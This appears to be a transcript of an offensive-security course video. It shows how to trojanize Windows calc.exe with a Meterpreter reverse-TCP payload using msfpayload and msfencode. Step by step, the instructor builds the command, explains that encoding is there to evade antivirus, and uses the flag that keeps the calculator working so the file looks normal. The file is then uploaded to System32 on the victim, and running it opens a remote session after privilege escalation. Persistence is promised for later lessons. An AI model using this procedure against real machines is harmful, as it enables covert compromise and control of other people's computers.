Okay, so in this video what we're going to try and do is we're going to work a little bit more with Msfpayload, but we're also going to work with Msfencode. We're going to use them together, and what we can do is we can take existing exe files that exist and combine them with our backdoor. And so I think we can go ahead and use Calculator, we can use Notepad, generally anything that is already on the Windows system. That way we don't have to do anything fancy and try to find some other piece of software or anything, but you can do this with any piece of software. So I think we'll probably just use Calculator, just because Calculator is on every Windows machine. So let's go ahead and give this a shot. I've got two things going on. I'm kind of left off where we were in the last video, so I am in MSF console and I already have my handler set up. If you need to catch up, you would just do use exploit multi in handler. Once you do that, you would need to set your payload to Windows interpreter reverse TCP. Hit enter, set your payload, and then you would need to show options and then go ahead and just set your values. Now what I'm going to be doing is I'm going to be using the handler. So what I'm going to do is I have to know the port number. That's super specific, and I have to remember that I uploaded my last backdoor to the C drive. It's still there. So that's what I'm going to be using. So if you need to go back and watch the previous video, please do that. I'm going to go ahead and hit run. And my listener is already going. So let's go ahead and double click on the backdoor. That's gone ahead and opened up an interpreter session. So exactly what we wanted. Super cool. Let's really quick get UID. We are not the NT authority system, so I'm going to try and grab the system, get those system privs, which I just did, get UID. There we go. Now I'm going to go ahead and look at the processes and migrate out of this process, just in case it gets shut down. So I'm going to choose 908. And then we should be pretty safe at that point. Alright, completed successfully. Alright, so now what we need to do is we need to download calc.exe. We're using the calculator. Now I'm in C drive :/Windows/System32. Now one way that you can do it is, if you're not familiar with it, just go to All Programs, Accessories, Calculator, right click on it, go to Properties, and it'll tell you at System32 calc.exe. It also says Start in C: Windows. It tells us the path. So if you need to know where to find it, that's one way to find it. And it's pretty universal. It should be like this for all the Windows operating systems, as far as I know. I'm not sure about Windows 8 though. So calculator, notepad, whatever it is, that's just one way to find it. Now we need to download this, not upload it, but download it. So we're going to do a download, and we're going to specify the file. C:, remember to use 2 backslashes, Windows, System32, calc.exe. And if I do this, it's just going to download it. It should download it into my root folder. Okay, it didn't do it. It looks like I missed a slash. There we go. There we go, and it worked. So cool. Let's go ahead and open up another terminal here and do an ls to list, and we can see that there it is, calc.exe. We downloaded it. Okay. So now let's go ahead and try to use our Msfpayload with Msfencode, and we're going to try to bundle these together and then re-upload it onto the system. That's the ultimate goal here. Alright, Msfpayload, we're going to choose Windows/interpreter/reverse TCP. We're going to set the L host equals to whatever your attacker machine is. We're going to set the L port. We can set it to whatever we want, but let's just do 8888. We'll keep that. and we're going to output it in raw format. So I'm going to use a capital R. And the reason that we need to keep it in raw format is because we're going to pipe it, use the pipe, MSF encode. Now we're going to pipe it through to MSF encode. So now we need to start using some MSF encode commands. So I will type all of this out, and then once I'm done, I will explain to you what all of this means. So -t exe, we're going to do a -x, specify the file, which ours is calc.exe in our root folder. -c, we'll go 15. -o, we'll name it calc-test.exe. -k. -k is super important. Okay, so what is this? I believe this is correct. I'll find out here soon enough. So what we're doing is we've got our MSF payload, which you should be familiar with. We're specifying the payload that we want. We want an interpreter session. We're specifying our local host, our attacker machine, the IP address, and the port that we want to go on, which is, I picked all 8s, and we're going to output it in raw format. It's not going to be an exe, so we're not going to put the X, we're not going to put C, it's just going to be capital R. We're going to use the pipe and then MSF encode. Now the -t specifies the file type, which is going to be an exe. The -x is going to use whatever file we choose as an existing template. So -x, we're going to use the existing calc.exe as a template. -c is the count, or the amount of times that we are going to encode our new exe. Now, the encoding obviously is used to try and get past the antivirus. So if we were unable to shut down antivirus, if we couldn't get those services stopped or whatever, then this would be a method that we can try and use to get around the antivirus without being flagged. So the AV, or the antivirus, is going to look for certain patterns and signatures, and so the more times that we can encode this, it jumbles it up, and the better chances that we have of getting past it. Now each time that you do an encode, the file size becomes larger. It's not going to be so large where it's like ridiculous, but if someone really knows their stuff and they want to start looking at files, the file will be larger. So the higher the count, the larger it is. The -o is going to be our output. We're going to save it as calc-test.exe. Finally, the -k, that's going to keep the original file operation. So the calc.exe that we're using, which launches the calculator, we want to keep that function. The way that it launches, what it does, we want to keep all of that functionality, and that's why we want to use a -k. If we don't put the -k, then most probably the calculator won't launch. It may launch the payload, but it's not going to launch. It's not going to work properly. So we want to keep that functionality so that it opens up and everything looks normal. So hopefully that makes that makes some sense. If you're confused or anything like that, just send me a message and we'll work it out. So I'm going to go ahead and hit enter. And this usually will take a second. We should see it starting to encode here in just a second. Alright, cool. So what we can see is it's using this Shikata Ganai, which is an excellent type, it's an excellent encoder, is what I should say. And there's different encoders that we can use, which we will look at that later on. But by default, it's using the best one, in my opinion, that Metasploit has. So we shouldn't need to change it. This has an excellent rating, so that's like the best thing that you can get. Now obviously if you're some super smart person and you make your own encoder that nobody else has, well then that's pretty sweet too. But for now we're going to use this encoder. And we can see it went 317, 344, 371, so it's getting larger. And we can see that it went all the way from 1 to 15, which is what we specified. So let's do an ls. And we can see that we have a calc test.exe now. So what we need to do now is we need to upload this to our victim. Now obviously, if we renamed it calc.exe, I would need to save it in a different location. Otherwise it would try and overwrite the existing calc.exe, and that would mess things up. So I don't want to do that. I hope that makes sense. We already have a calc.exe. So if I was going to save it in the same location and name it calc.exe, well, it can't do that because it's using the file as a template, but it's overwriting it at the same time. It can't do it. So we're naming it calc test.exe. Plus, we don't really want to screw up our Windows machine, even though I don't really care about the calculator. Anyways, oh man, let's jump back to Metasploit. And now we can upload. Remember, we want to upload. So let's upload. Specify root calc test.exe // Windows System 32. That should be it. And it says that it uploaded it. So let's go. Well, actually, what I'm going to go ahead and do now is let's just go ahead and exit it because I want to make sure that this works. So we're still got our handler. It's on port 8888. Let's hit run. So it's now listening again. Let's go back here and refresh this here. Let's see if it uploaded it. There's our calc test. Look at that. It even used the same icon and everything. And it says it's a Windows calculator application file. Tells us the company. It's Microsoft Corporation, the file version, all that sort of thing. So it used all of that as the template. And obviously that -k that we used should keep the functionality. So let's see what happens. Aha, look at that. It opened up calculator. And check that out. We have an interpreter session. That's pretty sweet. So we keep the functionality of the program. We can still do 1 + 1. I can't even do 1 + 1. How about that? 1 plus. Oh man. I need to go back to school, I think. 1 + 1 = 2. Yes. Alright. That's enough of that. Obviously, we could have overwrote this by just naming it calc.exe. You can use command line to delete the original calc, and then you can rename this calc to calc, and you can do that. So that's about it that I wanted to cover on this video. In the next couple of videos, we'll probably go into how to set these up as services so that they start up each time that the machine starts. We can even do things like every 10 seconds it will keep calling, making a callback to us. So not only can we just do it at startup, we can make it do it like every 10 seconds, every 20 seconds, every minute, whatever we want to do. So stay tuned, guys. I'm having a lot of fun. Hope you're enjoying the course, and we'll see you in the next video.